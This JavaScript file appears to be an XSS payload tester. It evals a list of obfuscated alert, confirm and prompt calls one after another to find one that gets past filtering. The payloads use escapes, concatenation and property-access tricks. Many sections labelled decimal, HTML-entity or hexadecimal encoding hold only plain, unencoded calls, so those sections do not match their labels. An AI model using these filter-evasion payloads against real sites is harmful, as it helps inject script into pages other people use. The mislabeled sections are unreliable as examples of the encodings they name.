(function() {
const payloads = [
// alert(1) payloads starting
'alert(1)',
'al\u0065rt(3)',
'alert(1)',
'alert(1)',
'(alert)(1)',
'a=alert,a(1)',
'[1].find(alert)',
'top["al"+"ert"](1)',
'top[/al/.source+/ert/.source](1)',
"top['al\145rt'](1)",
'top[8680439..toString(30)](1)',
// Add more payloads here
// Decimal-Encoded-Payloads
'alert(1)',
'alert(1)',
'alert(1)',
'alert(1)',
'alert(1)',
'alert(1)',
// Decimal-Encoded-Payloads-Special-Characters
'alert(1)',
// HTML-Entity-Encoding
'alert(1)',
'alert(1)',
'alert(1)',
'alert(1)',
'alert(1)',
'alert(1)',
// HTML-Entity-Encoding-Special-Characters
'alert(1)',
// HTML-Hexadecimal-Entity-Encoding
'alert(1)',
'alert(1)',
'alert(1)',
'alert(1)',
'alert(1)',
'alert(1)',
// HTML-Hexadecimal-Entity-Encoding-Special-Characters
'alert(1)',
// Unicode-Encoded-Payloads
'\u0061lert(1)',
'a\u006cert(1)',
'al\u0065rt(1)',
'ale\u0072t(1)',
'aler\u0074(1)',
'\u0061\u006c\u0065\u0072\u0074(1)',
// confirm(1) payloads starting
// Decimal-Encoded-Payloads
'confirm(1)',
'confirm(1)',
'confirm(1)',
'confirm(1)',
'confirm(1)',
'confirm(1)',
'confirm(1)',
'confirm(1)',
// Decimal-Encoded-Payloads-Special-Characters
'confirm(1)',
// HTML-Entity-Encoding
'confirm(1)',
'confirm(1)',
'confirm(1)',
'confirm(1)',
'confirm(1)',
'confirm(1)',
'confirm(1)',
'confirm(1)',
// HTML-Entity-Encoding-Special-Characters
'confirm(1)',
// HTML-Hexadecimal-Entity-Encoding
'confirm(1)',
'confirm(1)',
'confirm(1)',
'confirm(1)',
'confirm(1)',
'confirm(1)',
'confirm(1)',
'confirm(1)',
// HTML-Hexadecimal-Entity-Encoding-Special-Characters
'confirm(1)',
// Unicode-Encoded-Payloads
'\u0063onfirm(1)',
'c\u006fnfirm(1)',
'co\u006efirm(1)',
'con\u0066irm(1)',
'conf\u0069rm(1)',
'confi\u0072m(1)',
'confir\u006d(1)',
'\u0063\u006f\u006e\u0066\u0069\u0072\u006d(1)',
// prompt(1) payloads starting
// Decimal-Encoded-Payloads
'prompt(1)',
'prompt(1)',
'prompt(1)',
'prompt(1)',
'prompt(1)',
'prompt(1)',
'prompt(1)',
// Decimal-Encoded-Payloads-Special-Characters
'prompt(1)',
// HTML-Entity-Encoding
'prompt(1)',
'prompt(1)',
'prompt(1)',
'prompt(1)',
'prompt(1)',
'prompt(1)',
'prompt(1)',
// HTML-Entity-Encoding-Special-Characters
'prompt(1)',
// HTML-Hexadecimal-Entity-Encoding
'prompt(1)',
'prompt(1)',
'prompt(1)',
'prompt(1)',
'prompt(1)',
'prompt(1)',
'prompt(1)',
// HTML-Hexadecimal-Entity-Encoding-Special-Characters
'prompt(1)',
// Unicode-Encoded-Payloads
'\u0070rompt(1)',
'p\u0072ompt(1)',
'pr\u006fmpt(1)',
'pro\u006dpt(1)',
'prom\u0070t(1)',
'promp\u0074(1)',
'\u0070\u0072\u006f\u006d\u0070\u0074(1)',
];
let index = 0;
function tryPayload() {
if (index >= payloads.length) {
console.log('None of the payloads triggered');
return;
}
try {
eval(payloads[index]);
// If successful, you can exit or log a success message
console.log(`Payload succeeded: ${payloads[index]}`);
} catch (e) {
// Move to the next payload if the current one fails
index++;
tryPayload();
}
}
tryPayload();
})();